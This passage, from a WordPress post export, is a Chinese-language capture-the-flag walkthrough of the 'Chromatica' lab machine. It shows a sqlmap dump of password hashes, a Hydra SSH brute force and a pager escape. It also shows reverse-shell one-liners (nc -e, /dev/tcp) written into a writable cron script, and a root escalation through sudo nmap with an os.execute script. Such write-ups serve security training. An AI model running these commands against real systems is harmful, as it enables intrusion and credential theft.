--tables\nDatabase: Chromatica\n[2 tables]\n+--------+\n| cities |\n| users  |\n+--------+\n\nsqlmap -u &quot;http:\/\/172.20.10.3\/dev-portal\/search.php?city=Chicago&quot; --user-agent=&quot;dev&quot; -D Chromatica -T users --dump\nDatabase: Chromatica                                                                                                                                             \nTable: users\n[5 entries]\n+----+-----------------------------------------------+-----------+-----------------------------+\n| id | password                                      | username  | description                 |\n+----+-----------------------------------------------+-----------+-----------------------------+\n| 1  | 8d06f5ae0a469178b28bbd34d1da6ef3              | admin     | admin                       |\n| 2  | 1ea6762d9b86b5676052d1ebd5f649d7              | dev       | developer account for taz   |\n| 3  | 3dd0f70a06e2900693fc4b684484ac85 (keeptrying) | user      | user account for testing    |\n| 4  | f220c85e3ff19d043def2578888fb4e5              | dev-selim | developer account for selim |\n| 5  | aaf7fb4d4bffb8c8002978a9c9c6ddc9              | intern    | intern                      |\n+----+-----------------------------------------------+-----------+-----------------------------+<\/code><\/pre>\n<p>\u5c1d\u8bd5\u7834\u89e3\u4e00\u4e0b\u5176\u4ed6\u7684<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922892.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922892.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240513184047741\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6784\u9020\u5b57\u5178\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n<pre><code class=\"language-apl\">admin\ndev\nuser\ndev-selim\nintern<\/code><\/pre>\n<pre><code class=\"language-apl\">adm!n\nflaghere\nintern00\n8d06f5ae0a469178b28bbd34d1da6ef3\n1ea6762d9b86b5676052d1ebd5f649d7\nf220c85e3ff19d043def2578888fb4e5\naaf7fb4d4bffb8c8002978a9c9c6ddc9\nkeeptrying\n3dd0f70a06e2900693fc4b684484ac85<\/code><\/pre>\n<p>\u5c1d\u8bd5\u7206\u7834\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/chromatica]\n\u2514\u2500$ vim user.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/chromatica]\n\u2514\u2500$ vim pass.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/chromatica]\n\u2514\u2500$ hydra -L user.txt -P pass.txt ssh:\/\/172.20.10.3 2&gt;\/dev\/null\nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-05-13 06:43:07\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 45 login tries (l:5\/p:9), ~3 tries per task\n[DATA] attacking ssh:\/\/172.20.10.3:22\/\n[22][ssh] host: 172.20.10.3   login: dev   password: flaghere\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-05-13 06:43:20<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/chromatica]\n\u2514\u2500$ ssh dev@172.20.10.3                                         \nThe authenticity of host &#039;172.20.10.3 (172.20.10.3)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:+czsuAWX6K\/5Q5qXxqH5\/OquiT\/4\/G1bJTK0Urs9Z2E.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added &#039;172.20.10.3&#039; (ED25519) to the list of known hosts.\ndev@172.20.10.3&#039;s password: \nGREETINGS,\nTHIS ACCOUNT IS NOT A LOGIN ACCOUNT\nIF YOU WANNA DO SOME MAINTENANCE ON THIS ACCOUNT YOU HAVE TO\nEITHER CONTACT YOUR ADMIN\nOR THINK OUTSIDE THE BOX\nBE LAZY AND CONTACT YOUR ADMIN\nOR MAYBE YOU SHOULD USE YOUR HEAD MORE heh,,\nREGARDS\n\n    brightctf{ALM0ST_TH3R3_34897ffdf69}\nConnection to 172.20.10.3 closed.<\/code><\/pre>\n<p>\u4f46\u662f\u63d0\u4ea4\u53d1\u73b0flag\u4e0d\u5bf9\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-apl\">\u5927\u5bb6\u597d\uff0c\n\u6b64\u5e10\u6237\u4e0d\u662f\u767b\u5f55\u5e10\u6237\u3002\n\u5982\u679c\u60a8\u60f3\u5bf9\u6b64\u5e10\u6237\u8fdb\u884c\u4e00\u4e9b\u7ef4\u62a4\uff0c\u60a8\u5fc5\u987b\u3002\n\u6216\u8005\u8054\u7cfb\u60a8\u7684\u7ba1\u7406\u5458\u3002\n\u6216\u8005\u8df3\u51fa\u6846\u6846\u53bb\u601d\u8003\u3002\n\u61d2\u60f0\uff0c\u8054\u7cfb\u4f60\u7684\u7ba1\u7406\u5458\u3002\n\u6216\u8bb8\u4f60\u5e94\u8be5\u591a\u52a8\u52a8\u8111\u7b4b\u54c8\uff0c\n\u95ee\u5019\u3002\n\nBrightctf{ALM0ST_TH3R3_34897ffdf69}<\/code><\/pre>\n<p>\u5c1d\u8bd5\u767b\u5f55\u9875\u9762\uff0c\u4f46\u662f\u4ec0\u4e48\u4e1c\u897f\u4e5f\u6ca1\u6709\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922893.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922893.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240513185900758\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5ssh\u8fde\u63a5\uff0c\u8f93\u51fa\u62a5\u9519\uff1a<\/p>\n<pre><code class=\"language-bash\">ssh dev@172.20.10.3 -v<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922894.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922894.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240513190021103\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u5176\u5b9e\u8fdb\u5165\u4ea4\u4e92\u754c\u9762\u4e86\uff0c\u8054\u60f3\u5230\u4f5c\u8005\u63d0\u5230\u7684\u6362\u4e00\u4e2a\u601d\u8def\uff0c\u4ee5\u524d\u505a\u8fc7\u4e00\u4e2a\u673a\u5b50\u662f\u9700\u8981\u5229\u7528less\u8fdb\u884c\u7f29\u5c0f\u63d0\u6743\u7684\uff0c\u6240\u4ee5\u3002\u3002\u3002\u3002\u5c1d\u8bd5\u5728\u865a\u62df\u673a\u8fdb\u884c\u7f29\u5c0f\u8fdb\u884c\u4ea4\u4e92\uff0c\u53d1\u73b0\u5b58\u5728<code>more<\/code>\u53ef\u4ee5\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922895.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922895.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240513190520777\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922896.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922896.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240513190128086\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">dev@Chromatica:~$ sudo -l\n[sudo] password for dev:                                                                        \nSorry, user dev may not run sudo on Chromatica.                                                 \ndev@Chromatica:~$ ls -la                                                                        \ntotal 72                                                                                        \ndrwxr-x--- 7 dev  dev  4096 Apr 18 07:57 .                                                      \ndrwxr-xr-x 4 root root 4096 Mar 28  2023 ..                                                     \n-rw------- 1 dev  dev  3504 May 13 11:02 .bash_history                                          \n-rw-r--r-- 1 dev  dev   220 Jan  6  2022 .bash_logout                                           \n-rw-r--r-- 1 dev  dev  3814 Mar 28  2023 .bashrc                                                \n-rwxrwxr-x 1 root root   56 Mar 28  2023 bye.sh                                                 \ndrwx------ 2 dev  dev  4096 Mar 21  2023 .cache                                                 \ndrwxrwxr-x 3 dev  dev  4096 Mar 21  2023 .config                                                \ndrwx------ 3 dev  dev  4096 Apr 18 07:36 .gnupg                                                 \n-rw-rw-r-- 1 root root  280 Jun  2  2023 hello.txt                                              \n-rw------- 1 dev  dev    20 Mar 28  2023 .lesshst                                               \n-rw-r--r-- 1 dev  dev   807 Jan  6  2022 .profile                                               \ndrwx------ 4 dev  dev  4096 Mar 27  2023 snap                                                   \n-rw-r--r-- 1 root root   35 May 23  2023 user.txt                                               \ndrwxr-xr-x 2 dev  dev  4096 Jun 19  2023 .vim                                                   \n-rw------- 1 dev  dev  9900 Apr 18 07:57 .viminfo                                               \ndev@Chromatica:~$ cat bye.sh \n#!\/bin\/bash                                                                                     \n\n\/usr\/bin\/more \/home\/dev\/hello.txt                                                               \nexit 0                                                                                          \ndev@Chromatica:~$ cat \/home\/dev\/hello.txt                                                       \nGREETINGS,                                                                                      \nTHIS ACCOUNT IS NOT A LOGIN ACCOUNT                                                             \nIF YOU WANNA DO SOME MAINTENANCE ON THIS ACCOUNT YOU HAVE TO\nEITHER CONTACT YOUR ADMIN\nOR THINK OUTSIDE THE BOX\nBE LAZY AND CONTACT YOUR ADMIN\nOR MAYBE YOU SHOULD USE YOUR HEAD MORE heh,,\nREGARDS\n\nbrightctf{ALM0ST_TH3R3_34897ffdf69}\ndev@Chromatica:~$ cat .bash_history<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922897.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922897.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240513190656893\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u4e00\u4e0b\u8fd9\u4e2a\u7a0b\u5e8f\uff1a<\/p>\n<pre><code class=\"language-bash\">dev@Chromatica:~$ find \/ -name end_of_day.sh -type f 2&gt;\/dev\/null\n\/opt\/scripts\/end_of_day.sh\ndev@Chromatica:~$ ls -l \/opt\/scripts\/end_of_day.sh\n-rwxrwxrw- 1 analyst analyst 30 May 13 11:00 \/opt\/scripts\/end_of_day.sh\ndev@Chromatica:~$ cat \/opt\/scripts\/end_of_day.sh\n#this is my end of day script\ndev@Chromatica:~$ echo &#039;nc -e \/bin\/bash 172.20.10.8 1234&#039; &gt; \/opt\/scripts\/end_of_day.sh<\/code><\/pre>\n<p>\u67e5\u770b\u662f\u5426\u662f\u5b9a\u65f6\u4efb\u52a1\uff1a<\/p>\n<pre><code class=\"language-bash\">dev@Chromatica:~$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\n# You can also override PATH, but by default, newer versions inherit it from the environment\n#PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily )\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly )\n* *     * * *   analyst \/bin\/bash \/opt\/scripts\/end_of_day.sh\n#\ncat: \/etc\/cron.weekly: Is a directory<\/code><\/pre>\n<p>\u4f46\u662f\u534a\u5929\u6ca1\u5f39\u56de\u6765\uff0c\u5c1d\u8bd5\u6362\u4e00\u4e2a\uff1a<\/p>\n<pre><code class=\"language-bash\">dev@Chromatica:~$ echo &#039;\/bin\/bash -i &gt;&amp; \/dev\/tcp\/172.20.10.8\/1234 0&gt;&amp;1&#039; &gt; \/opt\/scripts\/end_of_day.sh<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/chromatica]\n\u2514\u2500$ sudo pwncat-cs -lp 1234 2&gt;\/dev\/null\n[07:08:23] Welcome to pwncat \ud83d\udc08!                                                                                               \n(remote) analyst@Chromatica:\/home\/analyst$ ls -la\ntotal 64\ndrwxr-x--x 6 analyst analyst 4096 Apr 24 14:04 .\ndrwxr-xr-x 4 root    root    4096 Mar 28  2023 ..\n-rw-r--r-- 1 root    root      36 May 23  2023 analyst.txt\n-rw------- 1 analyst analyst 3724 Apr 24 14:05 .bash_history\n-rw-r--r-- 1 analyst analyst  220 Jan  6  2022 .bash_logout\n-rw-r--r-- 1 analyst analyst 3771 Jan  6  2022 .bashrc\ndrwx------ 2 analyst analyst 4096 Mar 23  2023 .cache\ndrwx------ 3 analyst analyst 4096 Jun 19  2023 .config\ndrwx------ 3 analyst analyst 4096 Mar 27  2023 .gnupg\n-rw-rw-r-- 1 analyst analyst   96 Mar 21  2023 hello.txt\n-rw-r--r-- 1 analyst analyst  807 Jan  6  2022 .profile\n-rw-rw-r-- 1 analyst analyst   75 Mar 21  2023 .selected_editor\ndrwx------ 4 analyst analyst 4096 Mar 27  2023 snap\n-rw------- 1 analyst analyst 9275 Apr 24 14:04 .viminfo\n(remote) analyst@Chromatica:\/home\/analyst$ sudo -l\nMatching Defaults entries for analyst on Chromatica:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser analyst may run the following commands on Chromatica:\n    (ALL : ALL) NOPASSWD: \/usr\/bin\/nmap<\/code><\/pre>\n<p>\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922898.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922898.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240513191746623\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">(remote) analyst@Chromatica:\/home\/analyst$ TF=$(mktemp)\n(remote) analyst@Chromatica:\/home\/analyst$ echo &#039;os.execute(&quot;\/bin\/sh&quot;)&#039; &gt; $TF\n(remote) analyst@Chromatica:\/home\/analyst$ echo &#039;os.execute(&quot;\/bin\/bash&quot;)&#039; &gt; $TF\n(remote) analyst@Chromatica:\/home\/analyst$ sudo \/usr\/bin\/nmap --script=$TF\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2024-05-13 11:16 UTC\nNSE: Warning: Loading &#039;\/tmp\/tmp.9WwYZMchCS&#039; -- the recommended file extension is &#039;.nse&#039;.\nuid=0(root) gid=0(root) groups=0(root)\nroot@Chromatica:~# <\/code><\/pre>\n<p>\u62ff\u4e0b\uff01\uff01\uff01\uff01\uff01<\/p>\n<p>\u7eaa\u5ff5\u4e00\u4e0b\uff0c\u4e24\u4e2a\u5c0f\u65f6\u62ff\u4e0b\u7b2c\u4e00\u53f0\u5168\u4e00\u8840\uff01\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922899.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922899.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240513191916655\" style=\"zoom:33%;\" \/><\/div><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Chromatica \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/chromatica] [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[24,18],"tags":[],"class_list":["post-679","post","type-post","status-publish","format-standard","hentry","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/679","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=679"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/679\/revisions"}],"predecessor-version":[{"id":680,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/679\/revisions\/680"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=679"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=679"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=679"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}